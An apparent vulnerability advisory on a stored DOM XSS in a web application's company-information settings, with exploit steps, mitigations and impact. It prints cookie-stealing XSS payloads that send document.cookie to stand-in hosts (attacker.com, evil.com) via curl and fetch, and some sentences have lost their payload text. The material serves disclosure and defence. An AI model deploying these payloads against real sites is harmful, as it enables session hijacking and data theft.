Web Application, Stored DOM XSS, (No CVE) (Critical)

Listen to this Post

How the CVE Works:

The vulnerability resides in the System Settings – Company Information panel where administrative configuration fields are not sanitized. An attacker with admin access or via CSRF injects a JavaScript payload into fields like Company Name, Slogan, Phone, Email, or Google Maps iframe link. The application stores these payloads directly into the database without HTML encoding or output escaping. When any user – unauthenticated visitor or authenticated low-privilege user – loads the public-facing main landing page or other public pages, the server retrieves these stored values and inserts them into the DOM using unsafe methods such as .html() or innerHTML. The payload executes in the victim’s browser context, leading to persistent XSS. Unlike admin dashboard, execution occurs only on frontend pages, evading initial detection. The injection persists across sessions, affecting every subsequent visitor. Attackers can steal cookies, session tokens, or perform actions on behalf of the victim. The attack requires no user interaction beyond visiting the compromised public page. Endpoints involved: /backend/settings/ for injection (no execution there) and the main landing page for payload firing. The proof-of-concept uses in any company info field. Because the application lacks CSP headers and HttpOnly flags, exploitation is straightforward.

dailycve form:

Platform: Web Application
Version: Unspecified
Vulnerability: Stored DOM XSS
Severity: Critical
date: 2026-04-07

Prediction: Patch within 30 days

What Undercode Say:

Simulate payload injection via curl (admin cookie required)
curl -X POST https://target.com/backend/settings/ \
-H "Cookie: admin_session=..." \
-d "company_name=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>"
Grep for unsafe .html() usage in PHP/JS codebase
grep -r ".html(" /var/www/html --include=".php" --include=".js"
Monitor public pages for injected script tags
while true; do curl -s https://target.com/ | grep -i "<script|onerror"; sleep 5; done

Exploit:

  1. Login as admin, navigate to System Settings → Company Information.
  2. Inject payload into “Company Name”: `` or "><img src=x onerror=alert(document.domain)>.

3. Save settings.

  1. Visit main landing page – payload executes automatically.
  2. For stealth, use payload that exfiltrates cookies: fetch('https://evil.com/log?cookie='+document.cookie).

Protection from this CVE:

  • Use textContent instead of innerHTML or .html() when rendering user-controlled data.
  • Apply HTML encoding to all company information fields before output (e.g., htmlspecialchars in PHP).
  • Implement Content Security Policy (CSP) with script-src ‘self’ to block inline scripts.
  • Set HttpOnly and Secure flags on session cookies to prevent theft via XSS.
  • Validate and sanitize inputs on server side – reject HTML tags in configuration fields.
  • Use DOMPurify library for client-side sanitization if dynamic content is required.

Impact:

  • Persistent compromise of all public-facing pages – every visitor executes attacker’s script.
  • Session hijacking – attacker steals session cookies of any user (including admins) viewing the landing page.
  • Defacement – attacker can modify page content, redirect to phishing sites, or display fake login forms.
  • Escalation to CSRF – malicious script can perform authenticated requests on behalf of victims.
  • Data theft – exfiltration of sensitive information displayed on public pages (e.g., user emails, API keys).

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top